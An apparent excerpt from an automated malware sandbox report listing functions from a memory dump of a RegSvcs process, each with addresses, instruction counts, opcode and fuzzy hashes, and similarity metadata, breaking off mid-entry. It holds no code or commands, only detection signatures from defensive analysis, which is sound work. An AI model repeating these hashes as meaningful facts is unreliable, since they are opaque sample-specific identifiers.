                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8163b808ec9309288464ada25379b96596b5ecdd32f92aadb995d847bed3db24
                                                          • Instruction ID: 231881c5f341120608dc9b7b3381de38ef197a3b00f88ff443763bd29b16c93d
                                                          • Opcode Fuzzy Hash: 8163b808ec9309288464ada25379b96596b5ecdd32f92aadb995d847bed3db24
                                                          • Instruction Fuzzy Hash: A241E032900219CFDF61DF68D454BAE7BB0FB59314F25026BD921BB3A2DB349905CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01438BF0 Relevance: .1, Instructions: 124COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8b4c51f82eaa8d829d658d0cf719f4b368659a381f021de40e8fd847eb2200ef
                                                          • Instruction ID: e95529a6828e5025ac2ad83504fd5b1998a06c3f7b2b547251a891d294c857b1
                                                          • Opcode Fuzzy Hash: 8b4c51f82eaa8d829d658d0cf719f4b368659a381f021de40e8fd847eb2200ef
                                                          • Instruction Fuzzy Hash: 0641F272900202DBDB34DF59C840A6ABBB1FBE9610F25822FE9219B365C7759842CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01428918 Relevance: .1, Instructions: 123COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 979dba8659d1276d3c3b4fa4eba68d646773cdc09a394588c9f0c3a5f80014be
                                                          • Instruction ID: 0bd1b44aaab2b5e67247e2da2795410a784297ba2a85ddac95c97e6f542f477c
                                                          • Opcode Fuzzy Hash: 979dba8659d1276d3c3b4fa4eba68d646773cdc09a394588c9f0c3a5f80014be
                                                          • Instruction Fuzzy Hash: 2B4140725087169ED311EF598840A6FB7E9EF94B54F40092FF984D7260E730DE458B93
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0142A020 Relevance: .1, Instructions: 122COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                          • Instruction ID: 956e18870c2923859d02460652a93cd9875aada1d8e2e97be5ee3b5b505da888
                                                          • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                          • Instruction Fuzzy Hash: FC412671A00221DFDB21EE1984607BFBB61EB60754FA5806BEE40CB760D63A9D80CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014309AD Relevance: .1, Instructions: 122COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ada355bcdf88a67c357649771a497d7bc03960c218bdbcd5f9ee22f3f9a141c9
                                                          • Instruction ID: edd69ba0af774d280f46b10b358b94b703c4196dc9b4a22b1f557dba08c189c4
                                                          • Opcode Fuzzy Hash: ada355bcdf88a67c357649771a497d7bc03960c218bdbcd5f9ee22f3f9a141c9
                                                          • Instruction Fuzzy Hash: 3D415971640601EFD721DF19D840B26BBE4FFA8714F24866BE449CB361E771E9428B90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01460710 Relevance: .1, Instructions: 121COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                          • Instruction ID: ae4e9210400225a4d38f778875654f722a136db5f7dc1bf8f5cb85060548cd8f
                                                          • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                          • Instruction Fuzzy Hash: 9B414971A00705EFDB24CF99C980AAABBF8FF18704B10496EE556D7260D330EA44CF91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0143262C Relevance: .1, Instructions: 119COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d924ba168c1786247b48f6cc4e212e2c22c76df767469682d17b8721e9ceb855
                                                          • Instruction ID: 0322e4beba96a2fc5ec7a62d929e70c70f4a660da4ae46b9a3be9a45826f0b4d
                                                          • Opcode Fuzzy Hash: d924ba168c1786247b48f6cc4e212e2c22c76df767469682d17b8721e9ceb855
                                                          • Instruction Fuzzy Hash: 43419E71501711DFC722EF29C940A6AB7F1FFA9320F1181AFC41A9B2B1DBB09941DB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0146C8F9 Relevance: .1, Instructions: 116COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fcca6980c2202f66b1d2cc2fb4e2f10349c5eb2f99e9177d5428d5d79115720d
                                                          • Instruction ID: f15ccc4db3df864e8247fe864b53176b98a8c0f9d15cc78d758cfd14acb18bed
                                                          • Opcode Fuzzy Hash: fcca6980c2202f66b1d2cc2fb4e2f10349c5eb2f99e9177d5428d5d79115720d
                                                          • Instruction Fuzzy Hash: 263168B1A00246DFDB12CF98C440799BBF4FB19729F2181AED119EB2A1D3369906CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014B07C3 Relevance: .1, Instructions: 114COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0d2ec09caefc396c049bfa0e67bdca159b437398aa7ea4159417d0d758762bbe
                                                          • Instruction ID: 627bfc2dc3be687040aff076bb0975cc63748470b215bd337550d283f18b103b
                                                          • Opcode Fuzzy Hash: 0d2ec09caefc396c049bfa0e67bdca159b437398aa7ea4159417d0d758762bbe
                                                          • Instruction Fuzzy Hash: 70419F725043419FD720DF29C844B9BBBE8FF98654F104A2FF998D7261D7709905CBA2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014280A0 Relevance: .1, Instructions: 111COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3db1bdc8aa23c4aca8173ec11655187ff7cc69dac3816eced8102088c9dacccc
                                                          • Instruction ID: 3da73a910f96bc77d077111c5dda65fb5cf5acd7cb03fff5e5deedc9701f4bc0
                                                          • Opcode Fuzzy Hash: 3db1bdc8aa23c4aca8173ec11655187ff7cc69dac3816eced8102088c9dacccc
                                                          • Instruction Fuzzy Hash: 1C41D171A045279FDB01DF59C840ABDB7F1FF54660F64822BD815A73E0DB30AD818B90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014B05A7 Relevance: .1, Instructions: 111COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 82958e2c80877b93560e8c2c15ad5e267ebb48f9f1cc59fd4eb2d710b589c822
                                                          • Instruction ID: f867ae1d3a0c3b95de02937f7311a547395d7f8e0e80279b91378eee1b19b423
                                                          • Opcode Fuzzy Hash: 82958e2c80877b93560e8c2c15ad5e267ebb48f9f1cc59fd4eb2d710b589c822
                                                          • Instruction Fuzzy Hash: E541D3725047419FD320DF69C880AABB7F5BFD8700F14061EF958876A0E730D915C7A6
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01434859 Relevance: .1, Instructions: 111COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 90c1d4ceb6401d899ee59459aa7f4e5462e341e2d5fc3a37dfea3d1d0c30ef22
                                                          • Instruction ID: f631dfda97e2dda1cdfea37574368e9f264680e6cba8f5f1a6140d3df979c0ff
                                                          • Opcode Fuzzy Hash: 90c1d4ceb6401d899ee59459aa7f4e5462e341e2d5fc3a37dfea3d1d0c30ef22
                                                          • Instruction Fuzzy Hash: 3141B0312003028BD725DF29D884B6BBBE9EFD9360F18446EEA558B3B1DB70D805CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01428B50 Relevance: .1, Instructions: 111COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b9b523e929e89c41ebff7796b02b7f9015203e3c503ece53c7cb474c1d5de5ab
                                                          • Instruction ID: c50541937cb9a9c829538f37f1cf10a789dc001ec4954afe45b8bca4b11bdff1
                                                          • Opcode Fuzzy Hash: b9b523e929e89c41ebff7796b02b7f9015203e3c503ece53c7cb474c1d5de5ab
                                                          • Instruction Fuzzy Hash: F1419271A01626CFCB15DF6AC98099DBBF1FF98320B54856FE466A73B0D734A981CB40
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014402E1 Relevance: .1, Instructions: 106COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                          • Instruction ID: 587215e48f25395d2e0f2153e088178fd64788a2eabe736bf6be110939319d6f
                                                          • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                          • Instruction Fuzzy Hash: 10311831A04244AFEB219B69CC44BDBBFE9EF54350F04856BF855D7362C7749845CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014DE3DB Relevance: .1, Instructions: 105COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a82224c93d1f4f0d2742327a09e1723f7c46fda929a126062844d152a4fcc504
                                                          • Instruction ID: 14c50d0b3a94e3a75154d565a3edddedfe6f96adfd91244b61a07d691b055d34
                                                          • Opcode Fuzzy Hash: a82224c93d1f4f0d2742327a09e1723f7c46fda929a126062844d152a4fcc504
                                                          • Instruction Fuzzy Hash: 0E319C35740716ABEB329F568C51F6F7AA5AB59B50F10003AFA04BF3A1DAB4DC01C791
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014E4B4B Relevance: .1, Instructions: 104COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b1efe465e5c74e0ae464b55b0d57af0df917e79800bc85c3cbdff663c08bc168
                                                          • Instruction ID: d4891942fa2abb4b5370a60809e1b5ae6c656aa08ce5cce98d68de20b47e4992
                                                          • Opcode Fuzzy Hash: b1efe465e5c74e0ae464b55b0d57af0df917e79800bc85c3cbdff663c08bc168
                                                          • Instruction Fuzzy Hash: 3531EF322052018FC731DF19D884E26B7E5FB85361F0A446EE9A9DB361D730E855DB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01434260 Relevance: .1, Instructions: 102COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e6c48e9b441476695073603b61fe9f0c853936da1960b22430f0cb964072cda0
                                                          • Instruction ID: e9b13a9f5da11e4739ff11bcd41ebe854e0f3bf3e53e0ec2a594df0c95aa2447
                                                          • Opcode Fuzzy Hash: e6c48e9b441476695073603b61fe9f0c853936da1960b22430f0cb964072cda0
                                                          • Instruction Fuzzy Hash: D141AD71200B459FDB22CF69C880BD77BE9AB99714F15846EEA9A8B360C774E804CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014E4BB0 Relevance: .1, Instructions: 101COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 518ce7df6f0b1dad5b5aa1707ba5905a99fb053036aeb4c40c899707f2b399d9
                                                          • Instruction ID: 399e5a0f713e616aadda9fb7a9ab62056688d47eaabcf8950d34d364cb3b5afa
                                                          • Opcode Fuzzy Hash: 518ce7df6f0b1dad5b5aa1707ba5905a99fb053036aeb4c40c899707f2b399d9
                                                          • Instruction Fuzzy Hash: 5131AF716042018FD720DF29D885E2AB7E5FB84720F0A496EF965DB3A1D730EC15DB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014AEB1D Relevance: .1, Instructions: 100COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f9fd083a8b83a09ec377823a1de2e10d4e94bd8f8dae40ae7e45c6fbebecbb3c
                                                          • Instruction ID: db94c439599e3ef6a239257514540ad76f55e11b8def97ba9865f29c5da588f0
                                                          • Opcode Fuzzy Hash: f9fd083a8b83a09ec377823a1de2e10d4e94bd8f8dae40ae7e45c6fbebecbb3c
                                                          • Instruction Fuzzy Hash: 23310A712416829BF322D75DC94CB56BBD8BB20B40F5E00A6AB51AB7F1D738D841C230
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014F61C3 Relevance: .1, Instructions: 97COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d8d957ce2da28c896f0cfa8fdfab2513759de40d33d868fef9c8d054d1e6aaae
                                                          • Instruction ID: bbe80a4e25c5eeb1827910b4f467fcb141781262cd5d18be48238bce629aa38d
                                                          • Opcode Fuzzy Hash: d8d957ce2da28c896f0cfa8fdfab2513759de40d33d868fef9c8d054d1e6aaae
                                                          • Instruction Fuzzy Hash: 0931C47AA00156EBDB15EF98CC40BAEB7B5FB44B40F46416EEA00AB354D770ED01CB94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014D483A Relevance: .1, Instructions: 96COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f51edf83c3b27ee6680a939b3fc31d2d871f15358d41d8a77c40190c2ddd2e12
                                                          • Instruction ID: ed5a42eda87f889bbd605b7bc61b065626d8418810a5b4abcbf9590220d0bbfc
                                                          • Opcode Fuzzy Hash: f51edf83c3b27ee6680a939b3fc31d2d871f15358d41d8a77c40190c2ddd2e12
                                                          • Instruction Fuzzy Hash: EA317876A4012DABCF21DF55DC84BDEBBF5ABA8350F1401E6E508A7260CA30DE51CF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0145EB20 Relevance: .1, Instructions: 96COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4040995aeed8078bc252aa3d05e7721078985aa098d016ad646ba7d27563ab2f
                                                          • Instruction ID: 7b7326cf78b6cd5e67c83b5a6538f37207721abb541c064cad3974becc68ef62
                                                          • Opcode Fuzzy Hash: 4040995aeed8078bc252aa3d05e7721078985aa098d016ad646ba7d27563ab2f
                                                          • Instruction Fuzzy Hash: 8831C672E00215AFDB71DFA9C840A9FFBB9EF54750F01452BE916E7261D2709B018BA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014F60B8 Relevance: .1, Instructions: 95COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4bdb32ce2aa56b7d955605dcfffc175d72b7e9c53688a25c9f05d6de14c77bca
                                                          • Instruction ID: 29126f78380451fc7b14ee9217fd37c0f74c59d3d1401bc303f4d7ef739e10bd
                                                          • Opcode Fuzzy Hash: 4bdb32ce2aa56b7d955605dcfffc175d72b7e9c53688a25c9f05d6de14c77bca
                                                          • Instruction Fuzzy Hash: A231F672700216AFDB22DF9ACD40B6BBBB9AF54310F12006EE605DB361DA70DC0187D0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014307AF Relevance: .1, Instructions: 95COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 14f6b9d78732d7345bfd8e4663c188f20813c394d44e47e420e7660a201b9d12
                                                          • Instruction ID: eb5c881dc35e78511027d96086e7e76955d26f820f589f0608d835c3a6c92680
                                                          • Opcode Fuzzy Hash: 14f6b9d78732d7345bfd8e4663c188f20813c394d44e47e420e7660a201b9d12
                                                          • Instruction Fuzzy Hash: D531C872A04612DBC716DE298880A6BBBA5AFE8660F01462FFD55A7330DB30DC018BD1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01438550 Relevance: .1, Instructions: 94COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 74202601eb8c850913c47b53b8c9ddbee9234f0d97d28426b2bc398e519fd065
                                                          • Instruction ID: dae4b12b1005e1c6ddb89c04a1e282276b17c35be0dfdfeb31e87ea3fa838e54
                                                          • Opcode Fuzzy Hash: 74202601eb8c850913c47b53b8c9ddbee9234f0d97d28426b2bc398e519fd065
                                                          • Instruction Fuzzy Hash: EE319CB16053029FE721CF19C840B2BFBE5AB98710F044A6EFA84973A1D3B4E844CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0146A6C7 Relevance: .1, Instructions: 92COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                          • Instruction ID: 9a1ef53035982f9d8b7536da32365bf023dc95473ad0b15756a9593ec1ab4bad
                                                          • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                          • Instruction Fuzzy Hash: 4A314DB2B00B01AFD761CF69DD40B57BBFCBB18A54F19052EA59AD3760E630E800CB61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014DEBD0 Relevance: .1, Instructions: 91COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 483d55865d5a9cdb4d0cfa3be27ced65f3fbe223f6f1918d952ebda2f3540290
                                                          • Instruction ID: 5f01f109d2bebb606a8fd975263eb1b3a19d71dee0c1f334383fd767d1f8327a
                                                          • Opcode Fuzzy Hash: 483d55865d5a9cdb4d0cfa3be27ced65f3fbe223f6f1918d952ebda2f3540290
                                                          • Instruction Fuzzy Hash: 7C318972505311CFCB21DF1AC55095ABBF1FF9AA14F0449AEE888AF361D331DA45CB92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0145438F Relevance: .1, Instructions: 89COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5f78b4cf170d84a2912b14cd57efa389c21f7c4091886ec9010b4e712137e17c
                                                          • Instruction ID: e76a39f752cd9c3579746557003d41d20992d99cb791eca68a0a02826244c48e
                                                          • Opcode Fuzzy Hash: 5f78b4cf170d84a2912b14cd57efa389c21f7c4091886ec9010b4e712137e17c
                                                          • Instruction Fuzzy Hash: B931D332B002059FDB60EFA9C980A6F7BF9EB91304F04843BD905DB261E730E985CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0142CB7E Relevance: .1, Instructions: 89COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                          • Instruction ID: 3c5dad889ae5b3770376c7bcfa4c53ef5a916123e94dbddd5c2f44c9dfa6730d
                                                          • Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                          • Instruction Fuzzy Hash: CF212B36E4026BABD710EFBA8840BAFBBB5AF14740F158037DE15E7350E2B0D94187A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0142C156 Relevance: .1, Instructions: 88COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 27f61163854919827b0848c08877f6bf4bebcb57a9561840880f4485bca7920b
                                                          • Instruction ID: 367b61af1882ac27455d2a5965fe930a41725d3b1d2d959bcd0b24bf6f40bb0f
                                                          • Opcode Fuzzy Hash: 27f61163854919827b0848c08877f6bf4bebcb57a9561840880f4485bca7920b
                                                          • Instruction Fuzzy Hash: C23149729012118BD731BF58CC41BAD77B4AF50314F54816FED4A9F3E2DA749986CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014EC3CD Relevance: .1, Instructions: 88COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                          • Instruction ID: 761cc7cb11d029cd1ed1b6d765cbe84c7724088a9cb1cbe374141ae00181aa18
                                                          • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
